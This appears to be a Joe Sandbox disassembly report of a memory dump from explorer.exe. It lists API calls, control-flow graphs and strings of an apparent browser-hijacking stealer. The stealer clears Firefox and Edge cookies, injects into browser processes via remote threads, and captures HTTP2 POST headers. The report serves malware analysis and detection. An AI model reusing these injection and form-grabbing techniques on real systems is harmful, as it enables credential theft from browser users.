                                  control_flow_graph 134 83be1-83c3a call 81000 * 2 wsprintfA call 81235 141 83c3c-83c4c call 81141 134->141 142 83c5e 134->142 148 83c4e call 83829 141->148 149 83c53-83c59 call 81261 141->149 144 83c64-83c74 CreateToolhelp32Snapshot 142->144 146 83c7a-83c8e Process32First 144->146 147 83d7d-83d88 Sleep 144->147 150 83d6e-83d70 146->150 147->144 148->149 149->142 153 83c93-83ca5 lstrcmpi 150->153 154 83d76-83d77 CloseHandle 150->154 155 83cda-83ce3 call 812aa 153->155 156 83ca7-83cb5 lstrcmpi 153->156 154->147 162 83d62-83d68 Process32Next 155->162 163 83ce5-83cee call 81305 155->163 156->155 157 83cb7-83cc5 lstrcmpi 156->157 157->155 159 83cc7-83cd4 call 82ea8 157->159 159->155 159->162 162->150 163->162 167 83cf0-83cf7 call 81320 163->167 167->162 170 83cf9-83d06 call 81274 167->170 170->162 173 83d08-83d5d lstrcmpi call 81090 call 81fe5 call 81090 170->173 173->162
                                  APIs
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • wsprintfA.USER32 ref: 00083C1F
                                    • Part of subcall function 00081235: OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                    • Part of subcall function 00081235: MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00083C69
                                  • Process32First.KERNEL32(00000000,?), ref: 00083C88
                                  • lstrcmpi.KERNEL32(?,firefox.exe), ref: 00083CA1
                                  • lstrcmpi.KERNEL32(?,iexplore.exe), ref: 00083CB1
                                  • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083CC1
                                  • lstrcmpi.KERNEL32(?,microsoftedgecp.exe), ref: 00083D12
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 00083D68
                                  • CloseHandle.KERNEL32(00000000), ref: 00083D77
                                  • Sleep.KERNELBASE(000003E8), ref: 00083D82
                                    • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                    • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrcmpi$FileHeapProcess32lstrlen$AllocateCloseCreateFirstHandleMappingNextOpenProcessSleepSnapshotToolhelp32Viewwsprintf
                                  • String ID: %s%s$fgclearcookies$firefox.exe$iexplore.exe$microsoftedgecp.exe
                                  • API String ID: 2509890648-2554907557
                                  • Opcode ID: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                  • Instruction ID: b3decc60f1b6fd0102e2c0e98a0bf13bb15c07833eab530b9c5dae2245e78d24
                                  • Opcode Fuzzy Hash: 0d0ddd3babe7951f4962b83fe7927ab9f7e6e2b6a7115e594057a30b113bad32
                                  • Instruction Fuzzy Hash: AF41E6316047029BD614BB74EC45ABF37ADBF94B40F000518B9D297192EF39DE068BA6

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                    • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                    • Part of subcall function 00081363: CloseHandle.KERNELBASE(00000000), ref: 000813CB
                                    • Part of subcall function 00081363: lstrcmpi.KERNEL32(?), ref: 000813A3
                                    • Part of subcall function 00081363: Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                  • Sleep.KERNELBASE(000003E8,?,00000000,?,0008382F,?,00083C53,00000001), ref: 000835FA
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000), ref: 00083613
                                  • lstrcatW.KERNEL32(00000000,\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\), ref: 00083623
                                  • wsprintfW.USER32 ref: 00083644
                                    • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                    • Part of subcall function 000814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
                                    • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                    • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                    • Part of subcall function 000814D8: DeleteFileW.KERNELBASE(00000000), ref: 00081571
                                    • Part of subcall function 000814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
                                    • Part of subcall function 000814D8: FindClose.KERNELBASE(00000000), ref: 0008158F
                                    • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                    • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000021,00000000), ref: 00083672
                                  • lstrcatW.KERNEL32(00000000,00084614), ref: 00083682
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: FileHeap$Findwsprintf$CloseFirstFolderNextPathProcessProcess32Speciallstrcat$AllocateAttributesCreateDeleteFreeHandleSleepSnapshotToolhelp32lstrcmpi
                                  • String ID: %s%s$*.*$\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\$iexplore.exe$microsoftedge.exe$microsoftedgecp.exe
                                  • API String ID: 2436889709-3669280581
                                  • Opcode ID: fadd14bf89c54f29c561035e25b94334a211fe8576a283e6ce8d90d0ce59f8af
                                  • Instruction ID: 047cd47d4e76235a8978023a5c5691358bac471f200d8a84fde17aeb494bc27d
                                  • Opcode Fuzzy Hash: fadd14bf89c54f29c561035e25b94334a211fe8576a283e6ce8d90d0ce59f8af
                                  • Instruction Fuzzy Hash: 6F11703034060277FA143765AC9EFBE2599FFD6F42F150028B7C6AA2C2DE9849825769

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00081363: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                    • Part of subcall function 00081363: Process32First.KERNEL32(00000000,?), ref: 00081393
                                    • Part of subcall function 00081363: CloseHandle.KERNELBASE(00000000), ref: 000813CB
                                  • Sleep.KERNELBASE(000003E8,?,00000000,?,00083834,?,00083C53,00000001), ref: 000836B3
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001A,00000000), ref: 000836CC
                                  • lstrcatW.KERNEL32(00000000,\Mozilla\Firefox\Profiles\), ref: 000836DC
                                    • Part of subcall function 000814D8: wsprintfW.USER32 ref: 0008150D
                                    • Part of subcall function 000814D8: FindFirstFileW.KERNELBASE(00000000,?), ref: 0008151C
                                    • Part of subcall function 000814D8: wsprintfW.USER32 ref: 00081557
                                    • Part of subcall function 000814D8: SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0008156A
                                    • Part of subcall function 000814D8: DeleteFileW.KERNELBASE(00000000), ref: 00081571
                                    • Part of subcall function 000814D8: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00081584
                                    • Part of subcall function 000814D8: FindClose.KERNELBASE(00000000), ref: 0008158F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: File$Find$CloseFirstHeapwsprintf$AllocateAttributesCreateDeleteFolderHandleNextPathProcessProcess32SleepSnapshotSpecialToolhelp32lstrcat
                                  • String ID: \Mozilla\Firefox\Profiles\$cookies.sqlite$firefox.exe$sessionstore.*
                                  • API String ID: 2731919298-637609321
                                  • Opcode ID: 624656e6605f4b987df5a12e8ae5b15f913b8e14c12c72c41ec1462b20f1c9d9
                                  • Instruction ID: e4b6859fe632719e62c2471a373af4e41d7e2c2c30c1e964f33e307738a03490
                                  • Opcode Fuzzy Hash: 624656e6605f4b987df5a12e8ae5b15f913b8e14c12c72c41ec1462b20f1c9d9
                                  • Instruction Fuzzy Hash: A4F0A731300512339615336AAC0EDEF195DFFD7B52700012CB2C6962D2DE980943577A

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 279 81363-8137f CreateToolhelp32Snapshot 280 813d1-813d6 279->280 281 81381-81399 Process32First 279->281 282 813c6-813c8 281->282 283 813ca-813cb CloseHandle 282->283 284 8139b-813ab lstrcmpi 282->284 283->280 285 813b8-813c0 Process32Next 284->285 286 813ad-813b3 call 8133f 284->286 285->282 286->285
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00081374
                                  • Process32First.KERNEL32(00000000,?), ref: 00081393
                                  • lstrcmpi.KERNEL32(?), ref: 000813A3
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 000813C0
                                  • CloseHandle.KERNELBASE(00000000), ref: 000813CB
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
                                  • String ID:
                                  • API String ID: 868014591-0
                                  • Opcode ID: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                  • Instruction ID: f597f1abedfdb78b4a50bf3d8acbfe31b34690e914edc3f9a8282d2ed78ac4e0
                                  • Opcode Fuzzy Hash: 73177a2627c4fc77625abdc81e2021d595d42a0398085b95e880686d4ba7af21
                                  • Instruction Fuzzy Hash: 34F0C8315011149BE7706B25AC08BDF7BBCFF09321F0001A0F9D9E2190EB784E558F91

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 309 81235-81247 OpenFileMappingA 310 81249-81259 MapViewOfFile 309->310 311 8125c-81260 309->311 310->311
                                  APIs
                                  • OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 0008123F
                                  • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,00000000,00083C33), ref: 00081251
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: File$MappingOpenView
                                  • String ID:
                                  • API String ID: 3439327939-0
                                  • Opcode ID: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                  • Instruction ID: 31edbaac02ff07a1b824ab005dc06848c6bb7be7fdd6de8e3064e283bb2ae97a
                                  • Opcode Fuzzy Hash: 2b55954cab2d3ab23cb26bdc3426ab0b4883f1f8e4826569a64c97ab8e8399a0
                                  • Instruction Fuzzy Hash: 5ED017327052327BE3706ABB6C0CF836EDDEF86AE1B014025B649D2150D6608821C7F0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 312 81000-81010 GetProcessHeap RtlAllocateHeap
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                  • Instruction ID: 4deb57588eb96029a35becf2c55eca230ebc00b67c115c5e18b133d903a3b778
                                  • Opcode Fuzzy Hash: b94d352eba827c55e13339f87e9f3a43d9d04c7acd40f655af300f4012798e7b
                                  • Instruction Fuzzy Hash: 0EA002B59501115BFE4457E4BD0DB173518B744745F248544738685050A97854148F21

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 313 81011-8101b call 81274 316 8102d-8102e 313->316 317 8101d-81027 GetProcessHeap HeapFree 313->317 317->316
                                  APIs
                                    • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                  • HeapFree.KERNEL32(00000000), ref: 00081027
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Heap$FreeProcessQueryVirtual
                                  • String ID:
                                  • API String ID: 2580854192-0
                                  • Opcode ID: 5f42877d8e3920b7bfd873553e3772e2c12dbafe832c0d2951b5b4260f378939
                                  • Instruction ID: 73dac1b4d99c4d0101d6bf60127167cb710a494476b2b1900cddaa98e4698dba
                                  • Opcode Fuzzy Hash: 5f42877d8e3920b7bfd873553e3772e2c12dbafe832c0d2951b5b4260f378939
                                  • Instruction Fuzzy Hash: CCC08C3180426096DA6037E03C0CBC72A0CBF09251F040641B68492082CAB888168BA0

                                  Control-flow Graph

                                  APIs
                                    • Part of subcall function 00081274: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00081281
                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,?,00000001,756F3E2E), ref: 0008201A
                                  • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00082055
                                  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 000820E5
                                  • RtlMoveMemory.NTDLL(00000000,000850A0,00000016), ref: 0008210C
                                  • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00082134
                                  • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00082144
                                  • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter), ref: 0008215E
                                  • GetLastError.KERNEL32 ref: 00082166
                                  • CloseHandle.KERNEL32(00000000), ref: 00082174
                                  • Sleep.KERNEL32(000003E8), ref: 0008217B
                                  • GetModuleHandleA.KERNEL32(ntdll,atan), ref: 00082191
                                  • GetProcAddress.KERNEL32(00000000), ref: 00082198
                                  • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821AE
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 000821D8
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000821EB
                                  • CloseHandle.KERNEL32(00000000), ref: 000821F2
                                  • Sleep.KERNEL32(000001F4), ref: 000821F9
                                  • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 0008220D
                                  • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00082224
                                  • CloseHandle.KERNEL32(00000000), ref: 00082231
                                  • CloseHandle.KERNEL32(?), ref: 00082237
                                  • CloseHandle.KERNEL32(?), ref: 0008223D
                                  • CloseHandle.KERNEL32(00000000), ref: 00082240
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                  • String ID: atan$ntdll$opera_shared_counter
                                  • API String ID: 1066286714-2737717697
                                  • Opcode ID: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                  • Instruction ID: b8529cd7b6f7b3f81938f29da9ae38e819e5d60d405e704a022585a417c3316f
                                  • Opcode Fuzzy Hash: cb3eba5e0f163015cfdde3e865c7bed91dec7b23870b9c877b2fb9ccc63931f1
                                  • Instruction Fuzzy Hash: 56616D71508315AFE710AF658C88E6B7BECFB88754F000629BA89D3291D778DD058F66
                                  APIs
                                  • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 000811A9
                                  • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 000811C1
                                  • lstrlen.KERNEL32(?,00000000), ref: 000811C9
                                  • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 000811D4
                                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 000811EE
                                  • wsprintfA.USER32 ref: 00081205
                                  • CryptDestroyHash.ADVAPI32(?), ref: 0008121E
                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 00081228
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                  • String ID: %02X
                                  • API String ID: 3341110664-436463671
                                  • Opcode ID: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                  • Instruction ID: 298286c9a9371f5bd7e7a063f8446572b34c6f4efce2401be2fb8dd3adceacc5
                                  • Opcode Fuzzy Hash: b8a327b00917767bbca748ae488a158710af53418303ed8a59bb428a91e867ef
                                  • Instruction Fuzzy Hash: 62113D71900109BFEB119F95EC88EEFBBBCFB44701F104065F645E2150DB754E559B60
                                  APIs
                                  • GetCurrentProcessId.KERNEL32 ref: 000816D9
                                  • GetCurrentThreadId.KERNEL32 ref: 000816E1
                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 000816F1
                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 000816FF
                                  • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 0008171E
                                  • SuspendThread.KERNEL32(00000000), ref: 0008172E
                                  • CloseHandle.KERNEL32(00000000), ref: 0008173D
                                  • Thread32Next.KERNEL32(00000000,0000001C), ref: 0008174D
                                  • CloseHandle.KERNEL32(00000000), ref: 00081758
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                                  • String ID:
                                  • API String ID: 1467098526-0
                                  • Opcode ID: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                  • Instruction ID: 9f8a97b458fd6a1e1d725efe8f807f36da717ca79b52438bb26f371cecc15507
                                  • Opcode Fuzzy Hash: afb79f67b1f9fd075387a4cdec190970a8b480f67c71d1882683ab69d3bddf25
                                  • Instruction Fuzzy Hash: 53113C72408212EBE711AF60AC48AAFBFF8FF85711F05041DF6C592150D738894A9FA7
                                  APIs
                                  • OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                  • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                  • NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                  • StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                    • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                    • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Process$Heap$InformationQuery$AllocateFreeOpen
                                  • String ID: NetworkService
                                  • API String ID: 1656241333-2019834739
                                  • Opcode ID: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                  • Instruction ID: 2a2cb19856545ee97dced0d83344d7303902199a923c80ef4bb46b56f5b20446
                                  • Opcode Fuzzy Hash: c3c891bf310ddb1e1df04d13e9dff9e11e08e117764bfefb19d910cea458b283
                                  • Instruction Fuzzy Hash: EC01D471300346BFE7247B219C49FAB3A9DFFD8392F014029F68AD6142DAB59C808B20
                                  APIs
                                  • RtlMoveMemory.NTDLL(?,?,?), ref: 00081E83
                                  • LoadLibraryA.KERNEL32(?), ref: 00081EAB
                                  • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00081ED8
                                  • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00081F29
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                  • String ID:
                                  • API String ID: 3827878703-0
                                  • Opcode ID: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                  • Instruction ID: 568ebf0d0beaab3ca419b44d6bddffa2e7cdb8569d387974d06ed25d6f468c67
                                  • Opcode Fuzzy Hash: 88a57c618af0bce28b4bd03ce4e1436d8279253e8c428e03aa47962ae06e8f65
                                  • Instruction Fuzzy Hash: A4317A72700216ABCB689F29CC84BA6B7ECFF15354B15456CE986CB201D735E846CBA4
                                  APIs
                                  • StrStrIA.SHLWAPI(chrome.exe|opera.exe|msedge.exe,?), ref: 00082EB4
                                    • Part of subcall function 00082E1B: OpenProcess.KERNEL32(00001000,00000000,?,?,00000001,?,00082EC5), ref: 00082E27
                                    • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,00010006,?), ref: 00082E52
                                    • Part of subcall function 00082E1B: NtQueryInformationProcess.NTDLL(00000000,0000003C,00000000,?,?), ref: 00082E7F
                                    • Part of subcall function 00082E1B: StrStrIW.SHLWAPI(?,NetworkService), ref: 00082E92
                                  Strings
                                  • chrome.exe|opera.exe|msedge.exe, xrefs: 00082EAB
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: Process$InformationQuery$Open
                                  • String ID: chrome.exe|opera.exe|msedge.exe
                                  • API String ID: 4117927671-3743313796
                                  • Opcode ID: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                  • Instruction ID: 74462bb72cca3f48bcbab1f2b981006a3a1547241742571b3dc85306c1ef6728
                                  • Opcode Fuzzy Hash: d765239eed22a84fe2a582faad1555bd170bfb445a8a896243ebaaeda78abc67
                                  • Instruction Fuzzy Hash: C6D0A932300222072B2C367A6C0A86FA48DEBC2A62302013EF982C7240EA908C0343A4

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 355 82974-829a2 356 829a8-829aa 355->356 357 82b65-82b6d 355->357 356->357 358 829b0-829b9 call 81765 356->358 358->357 361 829bf-829c1 358->361 361->357 362 829c7-829c9 361->362 362->357 363 829cf-829df call 81141 362->363 363->357 366 829e5-82a0d call 81000 * 3 363->366 373 82a11 call 8104c 366->373 374 82a16-82a30 call 8285f 373->374 377 82a4c-82a64 call 8285f 374->377 378 82a32-82a42 call 8285f 374->378 384 82a6e-82a85 call 8285f 377->384 385 82a66-82a6c lstrcat 377->385 378->377 383 82a44-82a4a lstrcat 378->383 383->377 388 82a8f-82ab2 RtlZeroMemory call 8285f 384->388 389 82a87-82a8d lstrcat 384->389 385->384 392 82ac3 388->392 393 82ab4-82ac1 StrToIntA 388->393 389->388 394 82ac7-82ac9 392->394 393->394 395 82acb-82ace 394->395 396 82b42-82b64 call 8105d call 81011 * 3 394->396 395->396 398 82ad0-82ad7 395->398 396->357 398->396 400 82ad9-82adf 398->400 402 82ae5 call 8104c 400->402 404 82aea-82b29 wnsprintfA call 828ad 402->404 410 82b2b-82b2d lstrcat 404->410 411 82b2f-82b3e lstrcat * 2 404->411 410->411 411->396
                                  APIs
                                    • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                    • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                    • Part of subcall function 00081000: GetProcessHeap.KERNEL32(00000008,00000208,00081418), ref: 00081003
                                    • Part of subcall function 00081000: RtlAllocateHeap.NTDLL(00000000), ref: 0008100A
                                    • Part of subcall function 0008104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,00082A16,?,00000001), ref: 00081056
                                    • Part of subcall function 0008285F: RtlMoveMemory.NTDLL(?,-00000001,-00000001), ref: 000828A2
                                  • lstrcat.KERNEL32(00000000,dyn_header_host), ref: 00082A4A
                                  • lstrcat.KERNEL32(00000001,dyn_header_path), ref: 00082A6C
                                  • lstrcat.KERNEL32(?,dyn_header_ua), ref: 00082A8D
                                  • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082A96
                                  • StrToIntA.SHLWAPI(00000000), ref: 00082AB9
                                  • wnsprintfA.SHLWAPI ref: 00082B0D
                                  • lstrcat.KERNEL32(00000000,?), ref: 00082B2D
                                  • lstrcat.KERNEL32(00000000,{:!:}), ref: 00082B35
                                  • lstrcat.KERNEL32(00000000,?), ref: 00082B3C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrcat$HeapMemorylstrlen$AllocAllocateMoveProcessVirtualZerownsprintf
                                  • String ID: %s (HTTP2){:!:}%s%s{:!:}%s{:!:}$:authority $:method POST$:path $content-length $dyn_header_host$dyn_header_path$dyn_header_ua$host $user-agent ${:!:}
                                  • API String ID: 2605944266-950501416
                                  • Opcode ID: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                  • Instruction ID: d8dd03a251d738af89b9767004e5c399ca865ed0c4bb03e024ab117a7b61717e
                                  • Opcode Fuzzy Hash: 3708fc94a6399f6576d4b538be11fc28fac94a17c61d9412e710aaba2dbd2d1a
                                  • Instruction Fuzzy Hash: BF516D706043419BDB19BF24C984AAEBBDABF98304F04081DF8C597293DB78DC468B66
                                  APIs
                                    • Part of subcall function 00081141: lstrlen.KERNEL32(?,?,?,00000000,?,000829DD,00000001), ref: 00081150
                                    • Part of subcall function 00081141: lstrlen.KERNEL32(:method POST,?,00000000,?,000829DD,00000001), ref: 00081155
                                  • RtlZeroMemory.NTDLL(?,0000000A), ref: 00082FFA
                                  • StrToIntA.SHLWAPI(?), ref: 00083024
                                  • lstrlen.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00083347), ref: 00083052
                                  • wsprintfA.USER32 ref: 000830B9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 000830E5
                                  • lstrcat.KERNEL32(?,{:!:}), ref: 000830F8
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,00086038), ref: 00083109
                                  • RtlMoveMemory.NTDLL(00000000), ref: 00083112
                                    • Part of subcall function 00081011: GetProcessHeap.KERNEL32(00000000,00000000,00000000,000814CB), ref: 00081020
                                    • Part of subcall function 00081011: HeapFree.KERNEL32(00000000), ref: 00081027
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.618009053.0000000000081000.00000040.80000000.00040000.00000000.sdmp, Offset: 00081000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_81000_explorer.jbxd
                                  Similarity
                                  • API ID: lstrlen$HeapMemorylstrcat$FreeMoveProcessZerowsprintf
